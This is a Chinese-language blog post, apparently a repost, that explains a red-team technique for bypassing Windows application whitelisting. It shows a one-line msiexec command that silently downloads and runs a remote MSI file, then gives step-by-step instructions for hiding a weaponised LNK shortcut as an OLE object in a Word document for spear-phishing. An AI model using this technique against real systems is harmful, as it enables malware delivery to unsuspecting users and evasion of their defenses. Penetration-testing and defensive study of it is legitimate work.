msiexec 绕过应用程序白名单

前言

受到subTee已经完成的应用程序白名单工作的启发,我们决定寻找合法的Windows二进制文件,这些文件可以用于红队、突围测试等的恶意方法。

利用官方msiexec.exe二进制从Web服务器上下载一个MSI文件是可能的,并作为标准域用户执行它:

MsiExec /i https://www.url.com/test.png /q

创建恶意MSI

下面将告诉你如何使用Metasploit创建一个MSI文件,但Meatballs__在2013年写了一个好的博客显示这个确切的事情,所以没有必要重新造轮子:

http://rewtdance.blogspot.co.uk/2013/03/metasploit-msi-payload-generation.html

现实场景

我们将演示在MS Word文档中使用此技术。 基本上,我们将利用一个lnk文件调用msiexec的OLE对象。虽然这个技术已经存在了一段时间但却有用,如果你不将可执行文件嵌入到文档中的,可能会被抓住。

可以以快捷方式的形式获取命令执行。例如,这可以嵌入到文档中并通过鱼叉式网络钓鱼活动发送,在网络应用程序中的RCE运行,甚至在突破测试中使用。这种攻击的最好的事情类似于RegSvr32,是它从HTTP或HTTPS URL下载恶意软件的能力。如果你使用HTTPS,你会发现内容将被过滤到代理,,除非你的客户端正在执行SSL中间人。

下面需要做的第一件事是创建你的LNK文件,例如:

1-create-lnk-file图1、创建LNK文件

然后,将LNK文件指向您的恶意MSI文件:

2-point-lnk-file-to-msiexec-and-weaponise图2、将LNK文件指向msiexec和weaponise

这将导致一个完全武器化的LNK文件;在这种例子中称为“Secret Document”。

3-fully-weaponised-lnk-file图3、完全武器化的LNK文件

然后我们可以使用OLE对象将它嵌入到MS Word文档中,如下所示:

4-inserting-an-ole-package图4、插入OLE包

选择正版图标添加真实性:

5-pick-a-legitimate-looking-icon图5、选择正版图标

接下来,为OLE对象插入一个标题:

6-create-a-caption-for-the-ole-object图6、为OLE对象创建标题

接下来,浏览之前创建的LNK文件:

7-browse-to-the-weaponised-lnk-file图7、浏览LNK文件

现在你有一个完全武器化的文件:

8-secret-document-that-runs-an-lnk-file-using-msiexe图8、使用msiexec运行LNK文件指向的Secret document

当用户点击“打开”…

9-proof-of-concept图9、PoC

结论

显然,你可以创建一个作用更加强大的文件。我们将把这个练习留给读者。我们还发现了一些其他有趣的二进制文件,在后面的文章将继续提及。

*转载请注明来自MottoIN

原创文章,作者:Sam,如若转载,请注明出处:http://www.mottoin.com/article/terminal/94150.html

发表评论

登录后才能评论

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code